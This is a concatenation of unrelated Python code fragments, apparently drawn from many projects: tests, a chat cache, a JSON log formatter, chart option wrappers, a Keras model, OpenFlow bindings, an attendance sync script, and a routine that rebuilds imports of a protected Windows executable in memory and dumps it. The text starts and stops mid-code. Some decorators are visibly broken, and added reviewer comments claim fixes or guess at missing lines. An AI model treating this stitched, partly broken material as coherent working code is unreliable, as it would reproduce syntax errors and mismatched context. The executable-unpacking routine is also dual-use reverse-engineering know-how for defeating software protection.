        (bytearray(60), [{'length': 20, 'name': 'SafeSendLib', 'offsets': [1, 31]}], {'SafeSendLib': SAFE_SEND_CANON}, ((((b'\x00' + SAFE_SEND_CANON) + bytearray(10)) + SAFE_SEND_CANON) + bytearray(9))),
        # Two libraries, interleaved offsets.
        (bytearray(80), [{'length': 20, 'name': 'SafeSendLib', 'offsets': [1, 50]}, {'length': 20, 'name': 'SafeMathLib', 'offsets': [25]}], {'SafeSendLib': SAFE_SEND_CANON, 'SafeMathLib': SAFE_MATH_CANON}, ((((((b'\x00' + SAFE_SEND_CANON) + bytearray(4)) + SAFE_MATH_CANON) + bytearray(5)) + SAFE_SEND_CANON) + bytearray(10))),
    ),
)
def test_apply_all_link_refs(bytecode, link_refs, attr_dict, expected):
    """Every link reference must be patched into the bytecode at its offsets."""
    actual = apply_all_link_refs(bytecode, link_refs, attr_dict)
    assert (actual == expected)
class ChatDestinationCache():
    """Cache of recent chat destinations with per-entry expiry.

    Entries live in a WeakValueDictionary; a bounded deque of strong
    references keeps the newest *size* entries alive, so older entries are
    garbage-collected (and vanish from the weak mapping) once they age out
    of the deque.
    """

    def __init__(self, mode: str, size: int=CHAT_DEST_CACHE_SIZE):
        # The cache is active only in 'enabled' or 'warn' modes.
        self.enabled = (mode in ('enabled', 'warn'))
        if self.enabled:
            # Weak mapping of key -> cached destination entry.
            self.weak: 'WeakValueDictionary[str, ChatDestination]' = WeakValueDictionary()
            # Strong refs pinning the newest entries (maxlen evicts the oldest).
            self.strong: Deque[ChatDestination] = deque(maxlen=size)

    def get(self, key: str) -> Optional[EFBChannelChatIDStr]:
        """Return the cached destination for *key*, or None if absent or expired."""
        if (not self.enabled):
            return None
        val = self.weak.get(key, None)
        if (val is not None):
            if (time.time() > val.expiry):
                # Expired: drop both the strong and the weak reference.
                self.strong.remove(val)
                self.weak.pop(key)
                return None
            else:
                return val.destination
        return None

    def is_warned(self, key: str) -> bool:
        """True if a warning was already issued for *key* (or caching is disabled)."""
        if (not self.enabled):
            # With caching off, pretend already-warned so no warnings are issued.
            return True
        return ((key in self.weak) and self.weak[key].warned)

    def set_warned(self, key: str):
        """Mark the entry for *key* (if any) as having been warned about."""
        if (not self.enabled):
            return
        if (key in self.weak):
            self.weak[key].warned = True

    def set(self, key: str, value: EFBChannelChatIDStr, timeout: float=CHAT_DEST_CACHE_TIMEOUT):
        """Store *value* for *key*, refreshing the timeout if the value is unchanged."""
        if (not self.enabled):
            return
        if ((key in self.weak) and (self.weak[key].destination == value)):
            # Same destination: just extend the entry's lifetime.
            self.weak[key].update_timeout(timeout)
        else:
            # New entry: also keep a strong ref so the weak one stays alive.
            self.weak[key] = strong_ref = ChatDestination(value, timeout)
            self.strong.append(strong_ref)

    def remove(self, key: str):
        """Forget *key* if present (any strong ref simply ages out of the deque)."""
        if (not self.enabled):
            return
        return self.weak.pop(key, None)
class JsonFormatter(logging.Formatter):
    """Format log records as single-line JSON objects.

    Dict messages are merged into the JSON entry; any other message is stored
    under the ``message`` key.  (Bug fix: the original silently dropped every
    non-dict message, emitting only level and timestamp.)
    """

    def format(self, record):
        """Return *record* serialized as a JSON string."""
        log_entry = {
            'level': record.levelname,
            # Naive UTC timestamp, matching the original output format.
            'timestamp': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f'),
        }
        if isinstance(record.msg, dict):
            # Structured logging: merge the dict payload into the entry.
            log_entry.update(record.msg)
        else:
            # Fix: render ordinary messages (with %-args applied) instead of
            # dropping them.
            log_entry['message'] = record.getMessage()
        return json.dumps(log_entry)
class ServicePlanTestCaseTestFunction(Function):
    """A pytest Function representing one test case from a service-plan fixture file.

    Attaches the fixture test case as a method on the parent class, points the
    reported location at the fixture file, and copies class-level marks onto
    the generated test.
    """

    def __init__(self, parent, fixture_test_case_data):
        cls = parent.parent.obj
        test_name = 'plan__{fixture}__{test}'.format(fixture=fixture_test_case_data.fixture_name, test=fixture_test_case_data.name)
        if hasattr(cls, test_name):
            raise StatusError('Duplicate test name "{name}" in fixture "{fixture}"'.format(name=fixture_test_case_data.name, fixture=fixture_test_case_data.fixture_file))
        # Expose the fixture description as the generated test's docstring.
        fixture_test_case_data.callable.__doc__ = fixture_test_case_data.description
        setattr(cls, test_name, fixture_test_case_data.callable)
        super(ServicePlanTestCaseTestFunction, self).__init__(name=test_name, parent=parent)
        # Report the fixture file and line instead of the generated method's location.
        self._location = (self.session.fspath.bestrelpath(py.path.local(fixture_test_case_data.fixture_file)), fixture_test_case_data.line_number, self.location[2])
        self.fspath = py.path.local(fixture_test_case_data.fixture_file)
        # Rewrite the node id to <module>::<class>::<fixture>::<case>.
        self._nodeid = '::'.join((self.nodeid.split('::', 2)[:2] + [fixture_test_case_data.fixture_name, fixture_test_case_data.name]))
        self.fixture_test_case_data = fixture_test_case_data
        # Copy class-level marks; honor skip/skipif before applying fixture skips.
        skipped = False
        for mark in _get_unpacked_marks(cls):
            mark_copy = getattr(MARK_GEN, mark.name)(*mark.args, **mark.kwargs)
            self.add_marker(mark_copy)
            if ((mark.name == 'skip') or ((mark.name == 'skipif') and mark.args and mark.args[0])):
                skipped = True
        if ((not skipped) and fixture_test_case_data.skip):
            self.add_marker(pytest.mark.skip(reason=fixture_test_case_data.skip))

    def setup(self):
        # Deliberately bypasses Function.setup (note super(Function, self)).
        super(Function, self).setup()
        # Flag the first/last case of the fixture so class-level hooks can
        # perform one-time set-up / tear-down.
        if self.fixture_test_case_data.is_first_fixture_case:
            setattr(self.parent.obj, '_pytest_first_fixture_case', self.fixture_test_case_data)
        if self.fixture_test_case_data.is_last_fixture_case:
            setattr(self.parent.obj, '_pytest_last_fixture_case', self.fixture_test_case_data)
        fixtures.fillfixtures(self)

    def runtest(self):
        # Book-keeping for plugin statistics, then run the test normally.
        PLUGIN_STATISTICS['fixture_tests_executed'] += 1
        super(ServicePlanTestCaseTestFunction, self).runtest()

    def _prunetraceback(self, exception_info):
        """Trim plugin frames from the traceback and append a synthetic entry
        pointing at the fixture source of the failing test case."""
        # Find the deepest frame flagged as belonging to the test-plan runner.
        lowest_test_case_frame = next((tb for tb in reversed(exception_info.traceback) if (tb.locals.get('_test_function_frame', False) or tb.locals.get('_run_test_case_frame', False))), None)
        super(ServicePlanTestCaseTestFunction, self)._prunetraceback(exception_info)
        if (not lowest_test_case_frame):
            return
        if (self.config.getoption('pysoa_disable_tb_prune') is not True):
            # Drop frames from modules that opted into traceback pruning.
            exception_info.traceback = exception_info.traceback.filter((lambda x: (not x.frame.f_globals.get('__test_plan_prune_traceback'))))
        test_case = lowest_test_case_frame.locals['test_case']
        # Select which locals to surface depending on which runner frame matched.
        locals_to_copy = {'job_response', 'action_results', 'action_case'}
        if lowest_test_case_frame.locals.get('_test_function_frame', False):
            locals_to_copy = {'test_fixture_results', 'test_case'}
        extra_entry = ServicePlanFixtureTestTracebackEntry(name='{cls}::{fixture}::{test}'.format(cls=lowest_test_case_frame.locals['self'].__class__.__name__, fixture=test_case['fixture_name'], test=test_case['name']), line_number=test_case['line_number'], path=py.path.local(test_case['fixture_file_name']), local_variables={k: v for (k, v) in six.iteritems(lowest_test_case_frame.locals) if (k in locals_to_copy)}, fixture_source=test_case['fixture_source'], test_source=test_case['source'], raw_entry=lowest_test_case_frame._rawentry)
        exception_info.traceback.append(extra_entry)
class TaskID(str):
    """A string subclass whose instances can carry attributes copied from a request."""

    def __new__(cls, value, request=None):
        instance = str.__new__(cls, value)
        if request:
            # Copy every attribute of the request object onto this TaskID.
            instance.__dict__.update(request.__dict__)
        return instance

    def __repr__(self):
        return '<%s: %s>' % (type(self).__name__, self)

    def prefix(self):
        """Return the task prefix derived from this task id."""
        return task_prefix_from_task_id(self)
def test_invert():
    """Invert(ar) must behave as the exact inverse of the underlying bijector."""
    ar = Compose([AffineAutoregressive(params.DenseAutoregressive()), AffineAutoregressive(params.DenseAutoregressive())])
    shape = torch.Size([16])
    bij = ar(shape=shape)
    inv_bij = bijectors.Invert(ar)(shape=shape)
    # Share weights so inv_bij.forward can be compared against bij.inverse.
    inv_bij.load_state_dict(bij.state_dict(prefix='bijector.'))
    x = torch.randn(50, 16, requires_grad=True)
    torch.testing.assert_allclose(inv_bij.forward(x), bij.inverse(x))
    y = inv_bij.forward(x)
    # With y still attached to the flow, no warning may be raised.
    with warnings.catch_warnings():
        warnings.simplefilter('error')
        inv_bij.log_abs_det_jacobian(x, y)
    # A detached y must trigger a UserWarning.
    with pytest.warns(UserWarning):
        y_det = y.detach_from_flow()
        inv_bij.log_abs_det_jacobian(x, y_det)
    # The inverted Jacobian must equal the original with arguments swapped.
    y = y.detach_from_flow()
    torch.testing.assert_allclose(inv_bij.log_abs_det_jacobian(x, y), bij.log_abs_det_jacobian(y, x))
class Contrast(Filter):
    """Adjust the contrast of a color via a linear transfer function."""

    NAME = 'contrast'
    ALLOWED_SPACES = ('srgb-linear', 'srgb')

    def filter(self, color: 'Color', amount: Optional[float], **kwargs: Any) -> None:
        """Scale every color channel (alpha excluded) about the 0.5 midpoint in place."""
        # Missing amount means identity (1); negative amounts are clamped to 0.
        slope = alg.clamp(1 if amount is None else amount, 0)
        offset = (1 - slope) * 0.5
        for index, channel in enumerate(color[:-1]):
            color[index] = linear_transfer(channel, slope, offset)
class OptionPlotoptionsWindbarbSonificationTracksMappingHighpassResonance(Options):
    """Option wrapper for the windbarb sonification highpass ``resonance`` mapping.

    Fix: every accessor was defined twice under the same name (the getter was
    dead code, silently shadowed by the setter).  Restored as the
    ``@property``/``@<name>.setter`` pairs this Options pattern uses.
    """

    @property
    def mapFunction(self):
        """The configured mapping function, or None if unset."""
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        """The data property this mapping maps to, or None if unset."""
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        """The maximum mapped value, or None if unset."""
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        """The minimum mapped value, or None if unset."""
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        """The range the mapping is constrained to, or None if unset."""
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
def extractWentaoxuelinBlogspotCom(item):
    """Parser for release titles from 'wentaoxuelin.blogspot.com'."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    # Ignore items without chapter/volume info, and preview posts.
    if (not (chp or vol)) or ('preview' in item['title'].lower()):
        return None
    tagmap = [
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(
                item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type
            )
    # No known tag matched.
    return False
class TestMinHeap(unittest.TestCase):
    """Exercises MinHeap insert/extract behavior, checking the backing array."""

    def test_min_heap(self):
        heap = MinHeap()
        # Peeking/extracting from an empty heap yields None.
        self.assertEqual(heap.peek_min(), None)
        self.assertEqual(heap.extract_min(), None)
        # After each insert, the backing array must match the expected layout.
        insert_expectations = (
            (20, [20]),
            (5, [5, 20]),
            (15, [5, 20, 15]),
            (22, [5, 20, 15, 22]),
            (40, [5, 20, 15, 22, 40]),
            (3, [3, 20, 5, 22, 40, 15]),
        )
        for value, expected_array in insert_expectations:
            heap.insert(value)
            for position, expected in enumerate(expected_array):
                self.assertEqual(heap.array[position], expected)
        # Draining the heap must produce the values in sorted order.
        mins = []
        while heap:
            mins.append(heap.extract_min())
        self.assertEqual(mins, [3, 5, 15, 20, 22, 40])
        print('Success: test_min_heap')
@pytest.mark.django_db
def test_tas_balances_total(account_models, client):
    """Aggregate TAS balances grouped by rendering label and verify the sums.

    NOTE(review): the decorator's '@pytest.mark' prefix was reconstructed --
    the line had degraded to '.django_db' (a syntax error); confirm against
    the repository.
    """
    # Expected aggregate per TAS rendering label from the account_models fixture.
    response_tas_sums = {'XYZ': '10.00', 'ZZZ': '5.00'}
    resp = client.post('/api/v1/tas/balances/total/', content_type='application/json', data=json.dumps({'field': 'budget_authority_unobligated_balance_brought_forward_fyb', 'group': 'treasury_account_identifier__tas_rendering_label'}))
    assert (resp.status_code == 200)
    assert (len(resp.data['results']) == 2)
    for result in resp.data['results']:
        assert (response_tas_sums[result['item']] == result['aggregate'])
class RayLauncher(Launcher):
    """Hydra launcher that executes sweep jobs through Ray.

    The Ray configuration is supplied at construction; the Hydra context,
    task function, and composed config arrive later via ``setup``.
    """

    def __init__(self, ray: DictConfig) -> None:
        self.ray_cfg = ray
        # All three are populated by setup() before launch() may be called.
        self.hydra_context: Optional[HydraContext] = None
        self.task_function: Optional[TaskFunction] = None
        self.config: Optional[DictConfig] = None

    def setup(self, *, hydra_context: HydraContext, task_function: TaskFunction, config: DictConfig) -> None:
        """Record everything launch() needs to execute jobs."""
        self.hydra_context = hydra_context
        self.task_function = task_function
        self.config = config

    def launch(self, job_overrides: Sequence[Sequence[str]], initial_job_idx: int) -> Sequence[JobReturn]:
        """Run one job per override list, delegating to the _core module."""
        # Imported lazily so plugin discovery works without the heavy deps.
        from . import _core

        return _core.launch(launcher=self, job_overrides=job_overrides, initial_job_idx=initial_job_idx)
class OptionPlotoptionsOrganizationSonificationDefaultspeechoptionsMappingVolume(Options):
    """Config accessors for organization-series sonification speech ``volume`` mapping.

    NOTE(review): each option appears as a same-named getter/setter pair; in
    this generated style the pairs are normally decorated with ``@property`` /
    ``@<name>.setter`` -- confirm the decorators were not lost during extraction.
    """

    def mapFunction(self):
        # Getter: stored value, or None when unset.
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter: store the raw value (no JS-type wrapping).
        self._config(value, js_type=False)

    def mapTo(self):
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
class Model(object):
    """Small CNN classifier (3 conv/pool stages + dense softmax head) built with Keras."""

    def __init__(self, input_shape, output_labels_size):
        """Build and compile the network.

        input_shape: shape of one input sample, e.g. (H, W, C) -- TODO confirm.
        output_labels_size: number of output classes (softmax width).
        """
        model = keras.Sequential()
        model.add(layers.Convolution2D(16, (3, 3), padding='same', input_shape=input_shape, activation='relu'))
        model.add(layers.MaxPooling2D(pool_size=(2, 2)))
        model.add(layers.Convolution2D(32, (3, 3), padding='same', activation='relu'))
        model.add(layers.MaxPooling2D(pool_size=(2, 2)))
        model.add(layers.Convolution2D(64, (3, 3), padding='same', activation='relu'))
        model.add(layers.MaxPooling2D(pool_size=(2, 2)))
        model.add(layers.Flatten())
        model.add(layers.Dense(128, activation='relu'))
        model.add(layers.Dense(output_labels_size, activation='softmax'))
        model.compile(loss='categorical_crossentropy', optimizer=tf.train.AdamOptimizer(), metrics=['top_k_categorical_accuracy'])
        self.model = model
        print(model.summary())

    def fit(self, X, Y, batch_size=256, epochs=5, validation_split=0.1, verbose=2):
        """Train on (X, Y); Keras holds out the last fraction for validation."""
        self.model.fit(x=X, y=Y, batch_size=batch_size, epochs=epochs, validation_split=validation_split, verbose=verbose)

    def score(self, X, Y):
        """Return Keras evaluate() metrics (loss + top-k accuracy) on (X, Y)."""
        return self.model.evaluate(X, Y, verbose=0)

    def predict_one(self, x):
        """Predict class probabilities for a single sample (adds the batch axis)."""
        x = np.expand_dims(x, axis=0)
        pred = self.model.predict(x)[0]
        return pred

    def predict(self, X):
        """Predict class probabilities for a batch of samples."""
        return self.model.predict(X)

    def save(self, file):
        """Serialize the underlying Keras model to `file`."""
        self.model.save(file)

    @staticmethod
    def load(file):
        """Load a previously saved Keras model from `file`.

        Fix: declared as a staticmethod -- the original definition received
        the file path in the `self` slot, so calling it on an instance would
        pass the instance instead of the path.
        """
        return load_model(file)
('foremast.elb.format_listeners.get_template')
# NOTE(review): the line above looks like a patch decorator (e.g.
# '@mock.patch(...)') whose prefix was lost during extraction -- the
# `rendered_template` mock argument and `.return_value` usage below
# support that reading; confirm against the repository.
def test_elb_cert_name_v1(rendered_template):
    """format_cert_name resolves IAM vs ACM certificate ARNs from the v1 TLS JSON."""
    # The mocked template loader returns the canned v1 JSON fixture.
    rendered_template.return_value = SAMPLE_TLSCERT_V1_JSON
    # Plain wildcard names resolve to the IAM server certificate.
    iam_cert = 'arn:aws:iam:::server-certificate/wildcard.example.com-2020-07-15'
    assert (iam_cert == format_cert_name(env='prod', account='', region='us-east-1', certificate='wildcard.example.com'))
    # Env-qualified names resolve to ACM certificates in the request region.
    acm_cert = 'arn:aws:acm:us-east-1::certificate/-2222-3333-4444-'
    assert (acm_cert == format_cert_name(env='prod', account='', region='us-east-1', certificate='wildcard.prod.example.com'))
    # Region-qualified names resolve to the region-specific ACM certificate.
    acm_region_cert = 'arn:aws:acm:us-west-2::certificate/-0000-2222-3333-'
    assert (acm_region_cert == format_cert_name(env='prod', account='', region='us-west-2', certificate='wildcard.us-west-2.prod.example.com'))
def pull_process_and_push_data(device, device_attendance_logs=None):
    """Fetch attendance punches from a biometric device and push them to ERPNext.

    Successes and failures are appended to per-device log files; the success
    log doubles as a checkpoint so only punches newer than the last synced
    one are pushed on the next run. Raises when ERPNext rejects a punch with
    an error not in the allowlist.
    """
    # Per-device log files, e.g. attendance_success_log_<device_id>.log
    attendance_success_log_file = '_'.join(['attendance_success_log', device['device_id']])
    attendance_failed_log_file = '_'.join(['attendance_failed_log', device['device_id']])
    attendance_success_logger = setup_logger(attendance_success_log_file, ('/'.join([config.LOGS_DIRECTORY, attendance_success_log_file]) + '.log'))
    attendance_failed_logger = setup_logger(attendance_failed_log_file, ('/'.join([config.LOGS_DIRECTORY, attendance_failed_log_file]) + '.log'))
    if (not device_attendance_logs):
        device_attendance_logs = get_all_attendance_from_device(device['ip'], device_id=device['device_id'], clear_from_device_on_fetch=device['clear_from_device_on_fetch'])
        if (not device_attendance_logs):
            return
    index_of_last = (- 1)
    # Resume point: the last successfully synced punch (from the success log)
    # and/or the configured import start date -- whichever is later wins.
    last_line = get_last_line_from_file(('/'.join([config.LOGS_DIRECTORY, attendance_success_log_file]) + '.log'))
    import_start_date = _safe_convert_date(config.IMPORT_START_DATE, '%Y%m%d')
    if (last_line or import_start_date):
        last_user_id = None
        last_timestamp = None
        if last_line:
            # Success-log columns 4 and 5 hold the user id and epoch timestamp.
            (last_user_id, last_timestamp) = last_line.split('\t')[4:6]
            last_timestamp = datetime.datetime.fromtimestamp(float(last_timestamp))
        if import_start_date:
            if last_timestamp:
                if (last_timestamp < import_start_date):
                    # The configured start date supersedes an older checkpoint.
                    last_timestamp = import_start_date
                    last_user_id = None
            else:
                last_timestamp = import_start_date
        # Locate the checkpoint punch in the freshly fetched list.
        for (i, x) in enumerate(device_attendance_logs):
            if (last_user_id and last_timestamp):
                if ((last_user_id == str(x['user_id'])) and (last_timestamp == x['timestamp'])):
                    index_of_last = i
                    break
            elif last_timestamp:
                if (x['timestamp'] >= last_timestamp):
                    index_of_last = i
                    break
    # Push everything after the checkpoint.
    for device_attendance_log in device_attendance_logs[(index_of_last + 1):]:
        punch_direction = device['punch_direction']
        if (punch_direction == 'AUTO'):
            # Map the raw device punch code to IN/OUT; unknown codes send no direction.
            if (device_attendance_log['punch'] in device_punch_values_OUT):
                punch_direction = 'OUT'
            elif (device_attendance_log['punch'] in device_punch_values_IN):
                punch_direction = 'IN'
            else:
                punch_direction = None
        (erpnext_status_code, erpnext_message) = send_to_erpnext(device_attendance_log['user_id'], device_attendance_log['timestamp'], device['device_id'], punch_direction)
        if (erpnext_status_code == 200):
            attendance_success_logger.info('\t'.join([erpnext_message, str(device_attendance_log['uid']), str(device_attendance_log['user_id']), str(device_attendance_log['timestamp'].timestamp()), str(device_attendance_log['punch']), str(device_attendance_log['status']), json.dumps(device_attendance_log, default=str)]))
        else:
            attendance_failed_logger.error('\t'.join([str(erpnext_status_code), str(device_attendance_log['uid']), str(device_attendance_log['user_id']), str(device_attendance_log['timestamp'].timestamp()), str(device_attendance_log['punch']), str(device_attendance_log['status']), json.dumps(device_attendance_log, default=str)]))
            # Known/allowlisted errors are logged and skipped; anything else aborts.
            if (not any(((error in erpnext_message) for error in allowlisted_errors))):
                raise Exception('API Call to ERPNext Failed.')
_stats_reply_type(ofproto.OFPST_GROUP_DESC)
# NOTE(review): the line above looks like a class decorator whose '@' (and
# possibly a name prefix) was lost during extraction -- confirm against the
# repository.
class OFPGroupDescStats(StringifyMixin):
    """One entry of an OFPST_GROUP_DESC stats reply (group type, id, buckets)."""

    def __init__(self, type_, group_id, buckets, length=None):
        # `length` is accepted for parser symmetry; parser() assigns it on the
        # instance after construction rather than storing it here.
        self.type = type_
        self.group_id = group_id
        self.buckets = buckets

    def parser(cls, buf, offset):
        # NOTE(review): takes `cls` -- presumably decorated with @classmethod
        # in the original source; confirm the decorator was not lost.
        (length, type_, group_id) = struct.unpack_from(ofproto.OFP_GROUP_DESC_STATS_PACK_STR, buf, offset)
        # Buckets occupy the remainder of this stats entry.
        bucket_len = (length - ofproto.OFP_GROUP_DESC_STATS_SIZE)
        offset += ofproto.OFP_GROUP_DESC_STATS_SIZE
        buckets = []
        while (bucket_len > 0):
            bucket = OFPBucket.parser(buf, offset)
            buckets.append(bucket)
            offset += bucket.len
            bucket_len -= bucket.len
        o = cls(type_, group_id, buckets)
        o.length = length
        return o
def check_metric(mh, cfg, loc, metric, metrics, justifications):
    """Compare one measured metric against its configured upper limit.

    Records the limit on the metrics entry; when the measurement exceeds it,
    either applies a matching justification (counting it on `mh`) or raises
    a metric issue at `loc`.
    """
    # Guard clauses: metric must be enabled and configured for checking.
    if not cfg.metric_enabled(metric):
        return
    if not cfg.metric_check(metric):
        return
    entry = metrics[metric]
    measure = entry['measure']
    if measure is None:
        return
    limit = cfg.metric_upper_limit(metric)
    entry['limit'] = limit
    if measure <= limit:
        return
    if metric in justifications:
        # An explicit justification suppresses the issue but is tallied.
        mh.metric_justifications += 1
        just = justifications[metric]
        just.applies = True
        entry['reason'] = just.reason()
        entry['tickets'] = just.tickets
    else:
        message = ('exceeded %s: measured %u > limit %u' % (config.METRICS[metric].longname.lower(), measure, limit))
        mh.metric_issue(loc, message, metric)
class controller_status(message):
    """OpenFlow wire-version 6 OFPT message type 35 (controller status).

    NOTE(review): the of_controller_status_entry_t field is not implemented
    by this generated binding -- packing/unpacking `entry` goes through
    loxi.unimplemented.
    """
    version = 6
    type = 35

    def __init__(self, xid=None, entry=None):
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (entry != None):
            self.entry = entry
        else:
            self.entry = loxi.unimplemented('init of_controller_status_entry_t')
        return

    def pack(self):
        """Serialize to wire format; the length field is back-patched last."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # length placeholder, patched below
        packed.append(struct.pack('!L', self.xid))
        packed.append(loxi.unimplemented('pack of_controller_status_entry_t'))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)

    def unpack(reader):
        # NOTE(review): no `self`/`cls` parameter -- generated bindings
        # normally mark this @staticmethod; confirm the decorator wasn't lost.
        obj = controller_status()
        _version = reader.read('!B')[0]
        assert (_version == 6)
        _type = reader.read('!B')[0]
        assert (_type == 35)
        _length = reader.read('!H')[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)  # bound reads to this message
        obj.xid = reader.read('!L')[0]
        obj.entry = loxi.unimplemented('unpack of_controller_status_entry_t')
        return obj

    def __eq__(self, other):
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.entry != other.entry):
            return False
        return True

    def pretty_print(self, q):
        """Render a human-readable dump onto pretty-printer `q`."""
        q.text('controller_status {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('entry = ')
                q.pp(self.entry)
            q.breakable()
        q.text('}')
def read_solutions_table(readme_fp):
    """Parse the '### Contents' markdown table from the README at `readme_fp`.

    Returns a list of rows; in each row, cell 1 becomes a
    (question_title, question_url) tuple and cell 2 becomes a
    ([language, ...], solution_url) tuple. Other cells keep their raw text.
    Raises ValueError when a cell does not contain a markdown link.
    """
    link_re = re.compile('\\[(.+?)\\]\\((.+)\\)')

    def parse_line(line):
        # Split on '|' and drop the empty edge cells.
        cells = [cell for cell in line.strip().split('|') if cell]
        question = link_re.search(cells[1])
        if not question:
            raise ValueError('{} is not a valid link'.format(cells[1]))
        cells[1] = (question.group(1), question.group(2))
        solution = link_re.search(cells[2])
        if not solution:
            raise ValueError('{} is not a valid link'.format(cells[2]))
        # The link text may list several comma-separated languages.
        cells[2] = (solution.group(1).split(','), solution.group(2))
        return cells

    rows = []
    in_content = False
    begin_parsing = False
    with open(readme_fp) as ifile:
        for line in ifile:
            if line.startswith('### Contents'):
                in_content = True
            elif in_content and line.startswith('|---'):
                # The separator row marks the start of the data rows.
                begin_parsing = True
            elif begin_parsing and line.startswith('|'):
                rows.append(parse_line(line))
            elif begin_parsing and not line.strip():
                # A blank line terminates the table.
                begin_parsing = False
                in_content = False
    return rows
def fix_and_dump_pe(process_controller: ProcessController, pe_file_path: str, image_base: int, oep: int, text_section_range: MemoryRange) -> None:
    """Rebuild a protected PE's import table in-process and dump the fixed PE.

    Steps: read the live .text section, find calls routed through import
    wrappers, resolve them to real exported APIs, build a fresh IAT inside
    the target process, patch the call/jmp sites to use it, then dump the PE
    with the given OEP and the reconstructed IAT.
    """
    # Re-read .text from the live process at its mapped virtual address.
    section_virtual_addr = (image_base + text_section_range.base)
    text_section_range = MemoryRange(section_virtual_addr, text_section_range.size, 'r-x', process_controller.read_process_memory(section_virtual_addr, text_section_range.size))
    assert (text_section_range.data is not None)
    LOG.debug('.text section: %s', str(text_section_range))
    arch = process_controller.architecture
    exports_dict = process_controller.enumerate_exported_functions()
    # Configure capstone for the target bitness.
    if (arch == Architecture.X86_32):
        cs_mode = CS_MODE_32
    elif (arch == Architecture.X86_64):
        cs_mode = CS_MODE_64
    else:
        raise NotImplementedError(f'Unsupported architecture: {arch}')
    md = Cs(CS_ARCH_X86, cs_mode)
    md.detail = True
    LOG.info('Looking for wrapped imports ...')
    (api_to_calls, wrapper_set) = find_wrapped_imports(text_section_range, exports_dict, md, process_controller)
    LOG.info('Potential import wrappers found: %d', len(wrapper_set))
    # 32-bit only: resolution additionally matches wrappers against export hashes.
    export_hashes = None
    if (arch == Architecture.X86_32):
        LOG.info("Generating exports' hashes, this might take some time ...")
        export_hashes = _generate_export_hashes(md, exports_dict, process_controller)
    LOG.info('Resolving imports ...')
    _resolve_imports(api_to_calls, wrapper_set, export_hashes, md, process_controller)
    LOG.info('Imports resolved: %d', len(api_to_calls))
    (iat_addr, iat_size) = _generate_new_iat_in_process(api_to_calls, text_section_range.base, process_controller)
    LOG.info('Generated the fake IAT at %s, size=%s', hex(iat_addr), hex(iat_size))
    # .text must be writable while call/jmp sites are patched; restore r-x after.
    process_controller.set_memory_protection(text_section_range.base, text_section_range.size, 'rwx')
    LOG.info('Patching call and jmp sites ...')
    _fix_import_references_in_process(api_to_calls, iat_addr, process_controller)
    process_controller.set_memory_protection(text_section_range.base, text_section_range.size, 'r-x')
    LOG.info('Dumping PE with OEP=%s ...', hex(oep))
    dump_pe(process_controller, pe_file_path, image_base, oep, iat_addr, iat_size, True)
def check_valid_call():
    """Validate the CLI invocation for integration testing.

    Requires the pytest `-s` flag and exactly one target platform among
    platform_sh, fly_io, and heroku in the arguments. Returns True when the
    call is valid, False otherwise (after printing an explanation).

    Fix: removed an unreachable trailing `return False` -- both branches of
    the platform check already return.
    """
    if '-s' not in sys.argv:
        print('You must use the `-s` flag when running integration tests.')
        return False
    args = ' '.join(sys.argv)
    platforms = ('platform_sh', 'fly_io', 'heroku')
    # Exactly one platform must be targeted; zero or several are rejected.
    if sum(platform in args for platform in platforms) == 1:
        return True
    print('For integration testing, you must target one specific platform.')
    return False
class LiteSATAMirroring(Module):
    """Fan user SATA traffic out across N controllers via shared control logic.

    Exposes one user port per controller; the TX path routes user requests to
    the controllers and the RX path routes controller responses back, both
    coordinated by the ctrl submodule. (Presumably RAID-1-style mirroring,
    per the class name -- confirm against the module docs.)
    """

    def __init__(self, controllers):
        n = len(controllers)
        # Data width is taken from the first controller's sink.
        dw = len(controllers[0].sink.data)
        self.ports = [LiteSATAUserPort(dw) for i in range(n)]
        self.submodules.ctrl = LiteSATAMirroringCtrl(n)
        self.submodules.tx = LiteSATAMirroringTX(n, dw, self.ctrl)
        self.submodules.rx = LiteSATAMirroringRX(n, dw, self.ctrl)
        for i in range(n):
            # port -> TX -> controller (requests); controller -> RX -> port (responses)
            self.comb += [self.ports[i].sink.connect(self.tx.sinks[i]), self.tx.sources[i].connect(controllers[i].sink), controllers[i].source.connect(self.rx.sinks[i]), self.rx.sources[i].connect(self.ports[i].source)]
def build_head(config):
    """Instantiate a detection/recognition/classification head from a config dict.

    `config` must contain a 'name' key naming one of the supported head
    classes; the remaining keys are passed to the class constructor as
    keyword arguments. Note: 'name' is popped, so the caller's dict is
    mutated.

    Fix: the class is looked up in an explicit registry instead of calling
    eval() on the config-supplied name.
    """
    from .det_db_head import DBHead
    from .det_east_head import EASTHead
    from .det_sast_head import SASTHead
    from .det_pse_head import PSEHead
    from .e2e_pg_head import PGHead
